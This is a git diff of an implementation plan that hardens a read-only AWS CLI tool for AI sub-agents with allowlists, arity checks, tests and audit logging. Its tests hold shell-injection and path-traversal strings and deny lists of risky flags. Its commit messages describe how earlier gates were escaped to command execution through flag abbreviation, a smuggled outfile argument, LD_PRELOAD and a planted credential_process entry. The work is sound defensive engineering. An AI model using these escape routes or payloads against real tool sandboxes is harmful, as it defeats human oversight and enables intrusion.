+const awsReadSemaphore = new Semaphore(AWS_READ_CONCURRENCY);
 
-/** Operations that match the read prefix but mint credentials or mutate. */
-const DENIED_OPERATIONS = new Set([
-    'get-session-token', 'get-federation-token', 'get-login-password',
-    'get-token', 'get-password-data', 'get-cluster-credentials',
-    'get-instance-access-details', 'get-credential-report', 'get-authorization-token',
-]);
+/**
+ * Permitted (service, operation) pairs. Explicit, not prefix-matched: a `get-`
+ * prefix proves nothing — `redshift get-cluster-credentials` mutates, and
+ * `sts get-session-token`, `sso get-role-credentials`, `ecr get-login-password`
+ * and `secretsmanager get-secret-value` all return usable credentials.
+ *
+ * Add entries as the audit use case needs them. A refusal here is a feature
+ * request, never a security incident.
+ */
+export const ALLOWED_OPS: Record<string, ReadonlySet<string>> = {
+    ec2: new Set([
+        'describe-instances', 'describe-volumes', 'describe-snapshots', 'describe-images',
+        'describe-security-groups', 'describe-vpcs', 'describe-subnets', 'describe-addresses',
+        'describe-network-interfaces', 'describe-route-tables', 'describe-nat-gateways',
+        'describe-internet-gateways', 'describe-regions', 'describe-availability-zones',
+        'describe-instance-types', 'describe-tags',
+    ]),
+    rds: new Set(['describe-db-instances', 'describe-db-clusters', 'describe-db-snapshots']),
+    elbv2: new Set(['describe-load-balancers', 'describe-target-groups', 'describe-target-health']),
+    autoscaling: new Set(['describe-auto-scaling-groups', 'describe-auto-scaling-instances']),
+    ecs: new Set(['list-clusters', 'list-services', 'list-tasks', 'describe-clusters', 'describe-services', 'describe-tasks']),
+    eks: new Set(['list-clusters', 'describe-cluster', 'list-nodegroups', 'describe-nodegroup']),
+    lambda: new Set(['list-functions', 'get-function-configuration']),
+    s3api: new Set(['list-buckets', 'get-bucket-location', 'get-bucket-tagging', 'get-bucket-encryption', 'get-bucket-versioning']),
+    cloudwatch: new Set(['get-metric-statistics', 'list-metrics', 'describe-alarms']),
+    logs: new Set(['describe-log-groups', 'describe-log-streams', 'filter-log-events']),
+    cloudformation: new Set(['list-stacks', 'describe-stacks', 'describe-stack-resources']),
+    iam: new Set(['list-roles', 'list-policies', 'get-role', 'get-policy', 'list-attached-role-policies']),
+    sts: new Set(['get-caller-identity']),
+    ce: new Set(['get-cost-and-usage']),
+    tag: new Set(['get-resources']),
+};
 
-/** Flags that would let a structured call reach outside its intent. */
-const DENIED_FLAGS = new Set([
-    '--endpoint-url', '--cli-input-json', '--cli-input-yaml', '--outfile',
-    '--debug', '--no-sign-request', '--ca-bundle', '--cli-binary-format',
-]);
+/**
+ * Permitted flags and how many values each consumes.
+ *  - 'none' — a boolean flag. Value MUST be `true`; the flag is emitted alone, so
+ *    no value token exists to be mistaken for a positional.
+ *  - 'one'  — exactly one value.
+ *  - 'many' — one or more values (e.g. --instance-ids i-1 i-2).
+ *
+ * --profile, --region and --output are deliberately absent: the builder supplies
+ * them from validated fields, and allowing them here would let a later duplicate
+ * override the validated one (the AWS CLI takes the last occurrence).
+ */
+export const ALLOWED_FLAGS: Record<string, 'none' | 'one' | 'many'> = {
+    '--filters': 'many',
+    '--instance-ids': 'many',
+    '--volume-ids': 'many',
+    '--snapshot-ids': 'many',
+    '--group-ids': 'many',
+    '--names': 'many',
+    '--auto-scaling-group-names': 'many',
+    '--db-instance-identifier': 'one',
+    '--db-cluster-identifier': 'one',
+    '--cluster': 'one',
+    '--service': 'one',
+    '--services': 'many',
+    '--tasks': 'many',
+    '--function-name': 'one',
+    '--bucket': 'one',
+    '--log-group-name': 'one',
+    '--log-stream-names': 'many',
+    '--stack-name': 'one',
+    '--role-name': 'one',
+    '--policy-arn': 'one',
+    '--metric-name': 'one',
+    '--namespace': 'one',
+    '--dimensions': 'many',
+    '--statistics': 'many',
+    '--period': 'one',
+    '--start-time': 'one',
+    '--end-time': 'one',
+    '--time-period': 'one',
+    '--granularity': 'one',
+    '--metrics': 'many',
+    '--resource-type-filters': 'many',
+    '--query': 'one',
+    '--max-items': 'one',
+    '--starting-token': 'one',
+    '--page-size': 'one',
+    '--no-paginate': 'none',
+    '--include-deleted': 'none',
+};
 
-const IDENT = /^[a-z0-9][a-z0-9-]*$/;
+export type ParamValue = string | string[] | true;
+
+const SERVICE = /^[a-z0-9][a-z0-9-]*$/;
 const REGION = /^[a-z0-9-]+$/;
 const PROFILE = /^[A-Za-z0-9_-]+$/;
-const FLAG = /^--[a-z0-9][a-z0-9-]*$/;
 
-export function validateAwsReadRequest(input: {
-    service: string; operation: string; region?: string; profile?: string;
-    params?: Record<string, string>;
-}): string | null {
-    if (!IDENT.test(input.service)) return `service "${input.service}" is not a valid AWS service name`;
-    if (!IDENT.test(input.operation)) return `operation "${input.operation}" is not a valid operation name`;
-    if (DENIED_OPERATIONS.has(input.operation)) {
-        return `operation "${input.operation}" returns credentials or mutates state and is not available to sub-agents`;
+export interface AwsReadRequest {
+    service: string;
+    operation: string;
+    region?: string;
+    profile?: string;
+    params?: Record<string, ParamValue>;
+}
+
+/** Returns an error string for a refusal, or null when the request is permitted. */
+export function validateAwsReadRequest(input: AwsReadRequest): string | null {
+    if (typeof input?.service !== 'string' || !SERVICE.test(input.service)) {
+        return `service "${input?.service}" is not a permitted AWS service`;
     }
-    if (!READ_OPERATION_PREFIX.test(input.operation)) {
-        return `operation "${input.operation}" is not a read-only operation (must start with describe-, list-, get-, head-, search-, lookup-, check-, or batch-get-)`;
+    const operations = ALLOWED_OPS[input.service];
+    if (!operations) {
+        return `service "${input.service}" is not available to sub-agents (permitted: ${Object.keys(ALLOWED_OPS).join(', ')})`;
     }
-    if (input.region !== undefined && !REGION.test(input.region)) return `invalid region "${input.region}"`;
-    if (input.profile !== undefined && !PROFILE.test(input.profile)) return `invalid profile "${input.profile}"`;
+    if (typeof input.operation !== 'string' || !operations.has(input.operation)) {
+        return `operation "${input.operation}" is not a permitted read-only operation for ${input.service}`;
+    }
+    if (input.region !== undefined && (typeof input.region !== 'string' || !REGION.test(input.region))) {
+        return `invalid region "${input.region}"`;
+    }
+    if (input.profile !== undefined && (typeof input.profile !== 'string' || !PROFILE.test(input.profile))) {
+        return `invalid profile "${input.profile}"`;
+    }
 
     for (const [flag, value] of Object.entries(input.params ?? {})) {
-        if (!FLAG.test(flag)) return `parameter "${flag}" is not a valid --flag name`;
-        if (DENIED_FLAGS.has(flag)) return `parameter "${flag}" is not available to sub-agents`;
-        if (typeof value !== 'string') return `parameter "${flag}" must have a string value`;
+        const arity = Object.prototype.hasOwnProperty.call(ALLOWED_FLAGS, flag)
+            ? ALLOWED_FLAGS[flag] : undefined;
+        if (!arity) return `parameter "${flag}" is not a permitted flag`;
+
+        if (arity === 'none') {
+            // A value here is exactly the positional-smuggling vector.
+            if (value !== true) return `parameter "${flag}" takes no value — pass true`;
+            continue;
+        }
+        const values = Array.isArray(value) ? value : [value];
+        if (values.length === 0) return `parameter "${flag}" requires a value`;
+        if (arity === 'one' && values.length !== 1) return `parameter "${flag}" takes exactly one value`;
+        for (const v of values) {
+            if (typeof v !== 'string' || v.length === 0) return `parameter "${flag}" values must be non-empty strings`;
+        }
     }
     return null;
 }
 
-/** Build argv. Exported so tests can assert the exact array without executing anything. */
-export function buildAwsReadArgv(input: {
-    service: string; operation: string; region?: string; profile?: string;
-    params?: Record<string, string>;
-}): string[] {
+/**
+ * Build argv. Exported so tests can assert the exact array without executing.
+ * Every emitted token is either a flag or a value belonging to a flag of declared
+ * non-zero arity — so a positional argument cannot be produced.
+ */
+export function buildAwsReadArgv(input: AwsReadRequest): string[] {
     const argv = [input.service, input.operation];
     if (input.region) argv.push('--region', input.region);
     if (input.profile) argv.push('--profile', input.profile);
-    for (const [flag, value] of Object.entries(input.params ?? {})) argv.push(flag, value);
+    for (const [flag, value] of Object.entries(input.params ?? {})) {
+        if (ALLOWED_FLAGS[flag] === 'none') { argv.push(flag); continue; }
+        argv.push(flag, ...(Array.isArray(value) ? value : [value as string]));
+    }
     argv.push('--output', 'json');
     return argv;
 }
 
-export function createAwsReadTool(tenantId: string) {
+export function createAwsReadTool(tenantId: string, userId?: string) {
     return tool(
-        async (input: {
-            service: string; operation: string; region?: string; profile?: string;
-            params?: Record<string, string>;
-        }): Promise<string> => {
+        async (input: AwsReadRequest): Promise<string> => {
             const error = validateAwsReadRequest(input);
             if (error) return `REFUSED: ${error}`;
 
             const argv = buildAwsReadArgv(input);
+
+            // Sub-agent AWS activity has no human gate, so it must be auditable.
+            // Fire-and-forget: an audit failure must never block the read.
+            AuditService.logResourceAction({
+                eventType: 'agent.subagent.aws_read',
+                action: 'aws_read',
+                resourceType: 'agent_tool',
+                resourceId: 'aws_read',
+                resourceName: 'Sub-agent AWS read',
+                status: 'success',
+                details: `aws ${argv.join(' ')}`.slice(0, 2000),
+                user: userId || 'subagent',
+                userType: userId ? 'user' : 'system',
+                source: 'agent',
+                severity: 'low',
+                tenantId,
+                metadata: { tenantId, service: input.service, operation: input.operation },
+            }).catch(() => {});
+
             try {
-                // shell: false is the entire safety argument — argv elements are passed
-                // to execve directly and are never tokenised or interpreted.
-                const { stdout, stderr } = await execFileAsync('aws', argv, {
-                    shell: false,
-                    timeout: AWS_READ_TIMEOUT_MS,
-                    maxBuffer: AWS_READ_MAX_BUFFER,
-                    env: buildCommandEnv(tenantId) as NodeJS.ProcessEnv,
+                return await awsReadSemaphore.run(async () => {
+                    // shell: false is the safety argument — argv elements go to execve
+                    // directly and are never tokenised or interpreted.
+                    const { stdout, stderr } = await execFileAsync('aws', argv, {
+                        shell: false,
+                        timeout: AWS_READ_TIMEOUT_MS,
+                        maxBuffer: AWS_READ_MAX_BUFFER,
+                        env: buildCommandEnv(tenantId) as NodeJS.ProcessEnv,
+                    });
+                    const output = stdout || stderr || '(no output)';
+                    return output.length > AWS_READ_OUTPUT_MAX_CHARS
+                        ? `${output.slice(0, AWS_READ_OUTPUT_MAX_CHARS)}\n…[truncated]`
+                        : output;
                 });
-                const output = stdout || stderr || '(no output)';
-                return output.length > AWS_READ_OUTPUT_MAX_CHARS
-                    ? `${output.slice(0, AWS_READ_OUTPUT_MAX_CHARS)}\n…[truncated]`
-                    : output;
             } catch (err) {
                 const e = err as { message?: string; stderr?: string };
                 return `ERROR: ${e.message ?? String(err)}\n${e.stderr ?? ''}`.trim();
@@ -2572,147 +2710,205 @@ export function createAwsReadTool(tenantId: string) {
         },
         {
             name: 'aws_read',
-            description: `Run a READ-ONLY AWS CLI operation. This is your only route to AWS — you have no shell.
+            description: `Run a permitted READ-ONLY AWS CLI operation. This is your only route to AWS — you have no shell.
 
-Provide the service and operation separately; do not write a command line. Parameters are passed as a map of flag to value.
+Give the service and operation separately; never write a command line. Parameters are a map of flag to value, where a value is a string, an array of strings for multi-value flags, or true for flags that take no value.
 
-Example: { "service": "ec2", "operation": "describe-instances", "region": "us-east-1", "profile": "nucleus_agent_123456789012_...", "params": { "--filters": "Name=instance-state-name,Values=running" } }
+Example:
+{ "service": "ec2", "operation": "describe-instances", "region": "us-east-1", "profile": "nucleus_agent_...", "params": { "--instance-ids": ["i-1", "i-2"], "--no-paginate": true } }
 
-Only read operations are permitted (describe-, list-, get-, head-, search-, lookup-, check-, batch-get-). Mutations are refused: report what should change in your findings and the main agent will carry it out under human approval.`,
+Only an explicit allowlist of services and operations is permitted. If you need one that is refused, say so in your findings rather than trying to work around it — mutations and credential-returning operations are deliberately unavailable, and the main agent will carry out any change under human approval.`,
             schema: z.object({
                 service: z.string().describe('AWS service, e.g. "ec2", "rds", "cloudwatch"'),
                 operation: z.string().describe('Read-only operation, e.g. "describe-instances"'),
                 region: z.string().optional().describe('AWS region'),
                 profile: z.string().optional().describe('Profile name from get_aws_credentials'),
-                params: z.record(z.string(), z.string()).optional()
-                    .describe('CLI flags as a map, e.g. { "--instance-ids": "i-123" }'),
+                params: z.record(z.string(), z.union([z.string(), z.array(z.string()), z.literal(true)]))
+                    .optional()
+                    .describe('Flags: string, string[] for multi-value, or true for valueless flags'),
             }),
         },
     );
 }
 ```
 
-`buildCommandEnv` is currently module-private in `tools.ts` — export it. It already
-curates the environment (`session-manager`'s per-tenant credentials file, no app
-secrets), which is what makes `execFile` safe to hand a tenant profile.
+`buildCommandEnv` is module-private in `tools.ts` — export it. It already replaces
+(not merges) the environment and its `ALLOWED_KEYS` carries no loader variables, which
+is why `LD_PRELOAD`/`NODE_OPTIONS` cannot be inherited or injected.
 
-- [ ] **Step 8: Wire `aws_read` into the sub-agent tool list**
+- [ ] **Step 8: Let the jail permit `aws_read`, and wire it in**
 
-In `subagent.ts`, `runSubagentLoop` builds `allowedTools` from `deps.tools`. The
-orchestrator passes its own tool list, which contains `execute_command` — now denied.
-Add `aws_read` as a sub-agent-only tool. In `dispatch-agent-tool.ts` (Task 8) the
-`subagentTools` array becomes:
+`isReadOnlyForSubagent` currently refuses `aws_read`: `classifyTool` matches no rule for
+that name, returns `matchedRule: false`, and the fail-closed branch rejects it — so this
+tool was refused on every call and **the design had never actually run**.
+
+Fix it in `subagent.ts`, not `tool-classifier.ts` (the guard node's human-approval path
+must stay untouched). Add above `isReadOnlyForSubagent`:
 
 ```typescript
-subagentTools: [...filterReadOnlyTools(baseTools as never[]), createAwsReadTool(tenantId)],
+/**
+ * Tools built specifically for sub-agents, whose safety is enforced by their own
+ * implementation rather than by classifyTool. aws_read validates against explicit
+ * service/operation/flag allowlists and never invokes a shell.
+ */
+const SUBAGENT_ALLOWED_TOOLS = new Set(['aws_read']);
 ```
 
-Sub-agents keep `get_aws_credentials` (it returns a profile name, mutates nothing), so
-the flow is unchanged: acquire a profile, then pass it to `aws_read`.
+and, immediately after the denylist check:
 
-Update the sub-agent system prompt in `buildSystemPrompt` — replace the batching line
-with:
+```typescript
+    if (SUBAGENT_ALLOWED_TOOLS.has(name.toLowerCase())) {
+        return { allowed: true, reason: 'sub-agent read-only tool' };
+    }
+```
+
+Update the sub-agent system prompt in `buildSystemPrompt`:
 
 ```
-- You have NO shell. Reach AWS only through aws_read, passing the service and operation separately. Call get_aws_credentials first to obtain a profile name.
+- You have NO shell. Reach AWS only through aws_read, giving the service and operation separately. Call get_aws_credentials first to obtain a profile name.
 - Batch independent aws_read calls into a single turn — they run in parallel.
+- If aws_read refuses an operation you need, report that in your findings; do not try to work around it.
 ```
+
+Task 8 appends the tool after filtering:
+`subagentTools: [...filterReadOnlyTools(baseTools as never[]), createAwsReadTool(tenantId!, userId)]`.
 
 - [ ] **Step 9: Tests**
 
-Add `apps/web-ui/lib/agent/aws-read-tool.test.ts`:
+Replace `aws-read-tool.test.ts` entirely. Note the previous suite's positional test
+asserted argv *shape* (`!t.startsWith('--') && !a[i-1]?.startsWith('--')`), which a
+smuggled positional satisfies by construction — it passed while the hole was open. Assert
+the semantic property instead: for every emitted token, either it is a flag, or the flag
+it follows has non-zero declared arity.
 
 ```typescript
 import { describe, it, expect } from 'vitest';
-import { validateAwsReadRequest, buildAwsReadArgv } from './aws-read-tool';
+import { validateAwsReadRequest, buildAwsReadArgv, ALLOWED_FLAGS, ALLOWED_OPS } from './aws-read-tool';
+import { isReadOnlyForSubagent, filterReadOnlyTools } from './subagent';
 
 const ok = { service: 'ec2', operation: 'describe-instances' };
 
-describe('validateAwsReadRequest', () => {
-    it('accepts a read operation', () => {
-        expect(validateAwsReadRequest(ok)).toBeNull();
-    });
+describe('validateAwsReadRequest — service/operation allowlist', () => {
+    it('accepts a permitted pair', () => expect(validateAwsReadRequest(ok)).toBeNull());
 
-    it('refuses a mutating operation', () => {
-        for (const operation of ['terminate-instances', 'delete-bucket', 'sync', 'cp', 'run-instances']) {
-            expect(validateAwsReadRequest({ ...ok, operation })).toMatch(/not a read-only operation/);
+    it('refuses a service that is not allowlisted', () => {
+        for (const service of ['redshift', 'sso', 'cognito-identity', 'secretsmanager', 'ssm', 'gamelift', 'configure', 'ddb']) {
+            expect(validateAwsReadRequest({ service, operation: 'get-x' })).toMatch(/not available to sub-agents|not a permitted/);
         }
     });
 
-    it('refuses credential-minting reads that match the read prefix', () => {
-        for (const operation of [
-            'get-session-token', 'get-federation-token', 'get-login-password',
-            'get-token', 'get-password-data', 'get-cluster-credentials',
-        ]) {
-            expect(validateAwsReadRequest({ ...ok, service: 'sts', operation }))
-                .toMatch(/credentials or mutates/);
-        }
+    it('refuses credential-returning operations even on allowlisted services', () => {
+        // These defeated the previous denylist by simply not being on it.
+        expect(validateAwsReadRequest({ service: 'sts', operation: 'get-session-token' })).toMatch(/not a permitted/);
+        expect(validateAwsReadRequest({ service: 'sts', operation: 'get-federation-token' })).toMatch(/not a permitted/);
+        expect(validateAwsReadRequest({ service: 'ec2', operation: 'get-console-output' })).toMatch(/not a permitted/);
+        expect(validateAwsReadRequest({ service: 'ec2', operation: 'get-password-data' })).toMatch(/not a permitted/);
+        expect(validateAwsReadRequest({ service: 'iam', operation: 'get-credential-report' })).toMatch(/not a permitted/);
     });
 
-    it('refuses flags that reach outside the request', () => {
-        for (const flag of ['--endpoint-url', '--cli-input-json', '--outfile', '--no-sign-request']) {
-            expect(validateAwsReadRequest({ ...ok, params: { [flag]: 'x' } }))
-                .toMatch(/not available to sub-agents/);
+    it('refuses the file-write primitive', () => {
+        expect(validateAwsReadRequest({ service: 's3api', operation: 'get-object' })).toMatch(/not a permitted/);
+    });
+
+    it('refuses mutations', () => {
+        for (const operation of ['terminate-instances', 'delete-bucket', 'run-instances', 'sync', 'cp']) {
+            expect(validateAwsReadRequest({ ...ok, operation })).toMatch(/not a permitted/);
         }
     });
 
     it('refuses malformed identifiers rather than passing them through', () => {
-        expect(validateAwsReadRequest({ ...ok, service: 'ec2; rm -rf /' })).toMatch(/not a valid AWS service/);
-        expect(validateAwsReadRequest({ ...ok, operation: 'describe-instances && pulumi destroy' })).toMatch(/not a valid operation/);
+        expect(validateAwsReadRequest({ service: 'ec2; rm -rf /', operation: 'describe-instances' })).toMatch(/not a permitted AWS service/);
         expect(validateAwsReadRequest({ ...ok, region: 'us-east-1$(id)' })).toMatch(/invalid region/);
         expect(validateAwsReadRequest({ ...ok, profile: '../../etc/passwd' })).toMatch(/invalid profile/);
-        expect(validateAwsReadRequest({ ...ok, params: { 'notaflag': 'x' } })).toMatch(/not a valid --flag/);
+    });
+});
+
+describe('validateAwsReadRequest — flag allowlist and arity', () => {
+    it('refuses any flag that is not allowlisted, including abbreviations', () => {
+        // argparse has allow_abbrev=True, which defeated the previous denylist:
+        // --endpoint was accepted for the denied --endpoint-url and turned the CLI
+        // into an unauthenticated downloader.
+        for (const flag of ['--endpoint-url', '--endpoint', '--endpoint-ur', '--cli-input-json',
+                            '--cli-input-jso', '--no-sign-request', '--no-sign-reques', '--debug',
+                            '--debu', '--ca-bundle', '--ca-bundl', '--profile', '--region', '--output']) {
+            expect(validateAwsReadRequest({ ...ok, params: { [flag]: 'x' } })).toMatch(/not a permitted flag/);
+        }
+    });
+
+    it('refuses a value for a zero-arity flag — the positional-smuggling vector', () => {
+        expect(validateAwsReadRequest({ ...ok, params: { '--no-paginate': '/app/config.json' } }))
+            .toMatch(/takes no value/);
+    });
+
+    it('accepts true for a zero-arity flag', () => {
+        expect(validateAwsReadRequest({ ...ok, params: { '--no-paginate': true } })).toBeNull();
+    });
+
+    it('accepts multi-value flags', () => {
+        expect(validateAwsReadRequest({ ...ok, params: { '--instance-ids': ['i-1', 'i-2'] } })).toBeNull();
+    });
+
+    it('refuses multiple values for a single-value flag, and empty values', () => {
+        expect(validateAwsReadRequest({ ...ok, params: { '--query': ['a', 'b'] } })).toMatch(/exactly one value/);
+        expect(validateAwsReadRequest({ ...ok, params: { '--query': [] } })).toMatch(/requires a value/);
+        expect(validateAwsReadRequest({ ...ok, params: { '--query': '' } })).toMatch(/non-empty strings/);
+    });
+
+    it('is not fooled by inherited Object properties', () => {
+        expect(validateAwsReadRequest({ ...ok, params: { 'constructor': 'x' } as never })).toMatch(/not a permitted flag/);
+        expect(validateAwsReadRequest({ ...ok, params: { '__proto__': 'x' } as never })).toMatch(/not a permitted flag/);
     });
 });
 
 describe('buildAwsReadArgv', () => {
-    it('emits service, operation, flags and json output — never a shell string', () => {
-        expect(buildAwsReadArgv({
-            service: 'ec2', operation: 'describe-instances',
-            region: 'us-east-1', profile: 'nucleus_agent_1',
-            params: { '--instance-ids': 'i-123' },
-        })).toEqual([
-            'ec2', 'describe-instances', '--region', 'us-east-1',
-            '--profile', 'nucleus_agent_1', '--instance-ids', 'i-123',
-            '--output', 'json',
-        ]);
+    it('emits service, operation, validated region/profile and json output', () => {
+        expect(buildAwsReadArgv({ ...ok, region: 'us-east-1', profile: 'nucleus_agent_1', params: { '--instance-ids': ['i-1', 'i-2'] } }))
+            .toEqual(['ec2', 'describe-instances', '--region', 'us-east-1', '--profile', 'nucleus_agent_1',
+                      '--instance-ids', 'i-1', 'i-2', '--output', 'json']);
     });
 
-    it('emits no positional arguments, so an outfile cannot be supplied', () => {
-        const argv = buildAwsReadArgv({ service: 's3api', operation: 'get-object', params: { '--bucket': 'b', '--key': 'k' } });
-        // Every element after the leading service+operation is a flag or a flag's value.
-        expect(argv.slice(2).filter((t, i, a) => !t.startsWith('--') && !a[i - 1]?.startsWith('--'))).toEqual([]);
+    it('emits a zero-arity flag alone, with no value token', () => {
+        expect(buildAwsReadArgv({ ...ok, params: { '--no-paginate': true } }))
+            .toEqual(['ec2', 'describe-instances', '--no-paginate', '--output', 'json']);
     });
 
-    it('treats injection attempts as inert argv data', () => {
-        // These never reach a shell, so they are values — not code. Validation
-        // refuses them anyway; this pins that argv construction does not concatenate.
-        const argv = buildAwsReadArgv({ service: 'ec2', operation: 'describe-instances', params: { '--filters': 'a; rm -rf /' } });
-        expect(argv).toContain('a; rm -rf /');
-        expect(argv.join(' ')).not.toContain('&&');
-    });
-});
-```
-
-Replace the shell-allowlist block in `subagent.test.ts` with a much simpler assertion —
-shell is simply gone:
-
-```typescript
-describe('shell is unavailable to sub-agents', () => {
-    it('refuses every bash-like tool name in any case', () => {
-        for (const name of ['bash', 'shell', 'run_command', 'execute_command', 'Execute_Command', 'EXECUTE_COMMAND']) {
-            const verdict = isReadOnlyForSubagent(name, { command: 'aws ec2 describe-instances' });
-            expect(verdict.allowed).toBe(false);
-            expect(verdict.reason).toMatch(/not available to sub-agents/);
+    it('can never emit a positional argument (semantic, not shape-based)', () => {
+        // The previous suite checked argv SHAPE, which a smuggled positional satisfies
+        // by construction since it does follow a flag. Check the real property: every
+        // non-flag token must belong to a flag of declared non-zero arity.
+        const argv = buildAwsReadArgv({
+            ...ok, region: 'us-east-1', profile: 'p',
+            params: { '--instance-ids': ['i-1', 'i-2'], '--no-paginate': true, '--query': 'Reservations[]' },
+        });
+        const builderFlags = new Set(['--region', '--profile', '--output']);
+        let owner: string | null = null;
+        for (const token of argv.slice(2)) {
+            if (token.startsWith('--')) {
+                const arity = builderFlags.has(token) ? 'one' : ALLOWED_FLAGS[token];
+                expect(arity, `unexpected flag ${token}`).toBeDefined();
+                owner = arity === 'none' ? null : token;
+                continue;
+            }
+            expect(owner, `orphan positional "${token}"`).not.toBeNull();
         }
     });
 
-    it('drops shell tools from the filtered list', () => {
-        const kept = filterReadOnlyTools([
-            { name: 'describe_instances' }, { name: 'execute_command' },
-            { name: 'bash' }, { name: 'dispatch_agent' }, { name: 'ask_user' },
-        ]);
-        expect(kept.map(t => t.name)).toEqual(['describe_instances']);
+    it('treats injection attempts as inert argv data', () => {
+        const argv = buildAwsReadArgv({ ...ok, params: { '--query': 'a; rm -rf /' } });
+        expect(argv).toContain('a; rm -rf /');
+    });
+});
+
+describe('the jail permits aws_read and still refuses shell', () => {
+    it('allows aws_read — without this the tool is refused on every call', () => {
+        expect(isReadOnlyForSubagent('aws_read').allowed).toBe(true);
+    });
+
+    it('keeps aws_read through the filter alongside other read-only tools', () => {
+        expect(filterReadOnlyTools([
+            { name: 'aws_read' }, { name: 'get_aws_credentials' },
+            { name: 'execute_command' }, { name: 'dispatch_agent' },
+        ]).map(t => t.name)).toEqual(['aws_read', 'get_aws_credentials']);
     });
 });
 ```
@@ -2720,25 +2916,27 @@ describe('shell is unavailable to sub-agents', () => {
 Run: `cd apps/web-ui && bunx vitest run lib/agent/subagent.test.ts lib/agent/aws-read-tool.test.ts`
 
 ```bash
-git add apps/web-ui/lib/agent/subagent.ts apps/web-ui/lib/agent/subagent.test.ts \
-        apps/web-ui/lib/agent/aws-read-tool.ts apps/web-ui/lib/agent/aws-read-tool.test.ts \
+git add apps/web-ui/lib/agent/aws-read-tool.ts apps/web-ui/lib/agent/aws-read-tool.test.ts \
+        apps/web-ui/lib/agent/subagent.ts apps/web-ui/lib/agent/subagent.test.ts \
         apps/web-ui/lib/agent/tools.ts
-git commit -m "fix(agent)!: replace sub-agent shell parsing with a structured aws_read tool
+git commit -m "fix(agent)!: allowlist aws_read on every axis
 
-Two designs for gating a shell command string inside a sub-agent failed
-adversarial review. The second was escaped to full RCE: s3api get-object with
---endpoint-url fetches an arbitrary file from an arbitrary host to an arbitrary
-local path (the outfile positional was never examined), then an LD_PRELOAD
-prefix executes it. A boolean global flag also shifted which token was read as
-the operation, restoring 'aws s3 sync … --delete' against a production bucket.
+The structured tool still used DENYLISTS for flags and operations, and both were
+escaped. argparse has allow_abbrev=True, so --endpoint was accepted for the
+denied --endpoint-url, turning the CLI into an unauthenticated downloader; and a
+zero-arity flag (\"--no-cli-pager\": \"/tmp/x\") emitted \`flag value\`, whose value
+the CLI read as the positional outfile of s3api get-object. Chained, that wrote
+a credential_process entry into ~/.aws/config and executed arbitrary commands.
 
-Gating a shell string means modelling all of bash and all of AWS CLI semantics.
-Sub-agents now have no shell at all: aws_read takes service and operation
-separately, builds argv server-side, and runs execFile with shell: false, so
-metacharacters, quoting, flag-order confusion and env prefixes are
-unrepresentable rather than merely blocked. No positionals (so no outfile
-write), a denied-flag set (no --endpoint-url exfiltration, no --cli-input-json),
-and a denied-operation set (no credential-minting reads)."
+Enumerate the permitted instead: explicit (service, operation) pairs, explicit
+flags, and a declared arity per flag so a zero-arity flag emits no value token
+and a positional cannot be produced by construction. Arity also makes
+multi-value flags (--instance-ids i-1 i-2) and boolean flags expressible, which
+the previous revision could not do.
+
+Also: permit aws_read in the sub-agent jail (it was refused on every call, so
+this path had never run), bound concurrent aws subprocesses, and audit-log every
+call — sub-agent AWS activity has no human gate."
 ```
 
 ---
@@ -3117,7 +3315,7 @@ Then replace the tool-assembly block at line 226 with:
             model,
             // Sub-agents have NO shell (Task 7 Step 6). aws_read is their only
             // route to AWS; it builds argv and runs execFile with shell: false.
-            subagentTools: [...filterReadOnlyTools(baseTools as never[]), createAwsReadTool(tenantId!)],
+            subagentTools: [...filterReadOnlyTools(baseTools as never[]), createAwsReadTool(tenantId!, config.userId)],
             ledger: createRunBudgetLedger(subagentBudget),
             budget: subagentBudget,
             onSubagentEvent: config.onSubagentEvent,

--- a/docs/superpowers/plans/2026-07-26-aiops-subagent-orchestration.md
+++ b/docs/superpowers/plans/2026-07-26-aiops-subagent-orchestration.md
@@ -1632,7 +1632,7 @@ import { useForm } from 'react-hook-form';
 import { zodResolver } from '@hookform/resolvers/zod';
 import { z } from 'zod';
 import { toast } from 'sonner';
-import { Bot, Gauge, Loader2, Save } from 'lucide-react';
+import { Bot, Gauge, Save } from 'lucide-react';
 
 import {
   useAiopsSubagentSettings,
@@ -1729,6 +1729,12 @@ export function AiopsSubagentSettings() {
   const platformEnabled = data?.platformEnabled ?? false;
   const bounds = data?.bounds;
 
+  // Zod rejects a blank number input as NaN before onSubmit ever runs. Without an
+  // invalid handler the click is a silent no-op with zero feedback, so surface it.
+  const onInvalid = () => {
+    toast.error('Some values are invalid — check the highlighted fields.');
+  };
+
   const onSubmit = async (values: FormValues) => {
     // Bounds are enforced server-side too; this only produces a friendlier message.
     for (const field of FIELDS) {
@@ -1748,7 +1754,7 @@ export function AiopsSubagentSettings() {
   };
 
   return (
-    <form onSubmit={form.handleSubmit(onSubmit)} className="flex-1 max-w-3xl mx-auto space-y-6">
+    <form onSubmit={form.handleSubmit(onSubmit, onInvalid)} className="flex-1 max-w-3xl mx-auto space-y-6">
       <div>
         <h1 className="text-2xl font-bold">Sub-Agents</h1>
         <p className="text-muted-foreground mt-1">
@@ -1761,8 +1767,8 @@ export function AiopsSubagentSettings() {
       {!platformEnabled && (
         <Alert>
           <AlertDescription>
-            Sub-agents are disabled for this deployment. These settings are saved but will not take
-            effect until an administrator enables the feature.
+            Sub-agents are disabled for this deployment, so these settings are read-only. An
+            administrator must enable the feature before they can be changed.
           </AlertDescription>
         </Alert>
       )}
@@ -1822,6 +1828,11 @@ export function AiopsSubagentSettings() {
                     Allowed: {bound.min}–{bound.max}. Default {bound.default}.
                   </p>
                 )}
+                {form.formState.errors[field.name] && (
+                  <p className="text-xs text-destructive">
+                    Enter a whole number between {bound?.min} and {bound?.max}.
+                  </p>
+                )}
               </div>
             );
           })}
@@ -1830,7 +1841,7 @@ export function AiopsSubagentSettings() {
 
       <Button type="submit" disabled={saveMutation.isPending || !platformEnabled}>
         {saveMutation.isPending ? (
-          <Loader2 className="h-4 w-4 mr-2 animate-spin" />
+          <Spinner className="h-4 w-4 mr-2" />
         ) : (
           <Save className="h-4 w-4 mr-2" />
         )}

--- a/docs/superpowers/plans/2026-07-26-aiops-subagent-orchestration.md
+++ b/docs/superpowers/plans/2026-07-26-aiops-subagent-orchestration.md
@@ -1,0 +1,3523 @@
+# AIOps Sub-Agent Orchestration Implementation Plan
+
+> **For agentic workers:** REQUIRED SUB-SKILL: Use superpowers:subagent-driven-development (recommended) or superpowers:executing-plans to implement this plan task-by-task. Steps use checkbox (`- [ ]`) syntax for tracking.
+
+**Goal:** Cut AI Ops chat run time from ~10 minutes by adding intra-turn parallel tool calls and a read-only `dispatch_agent` sub-agent tool with isolated context, bounded by tenant-configurable budgets.
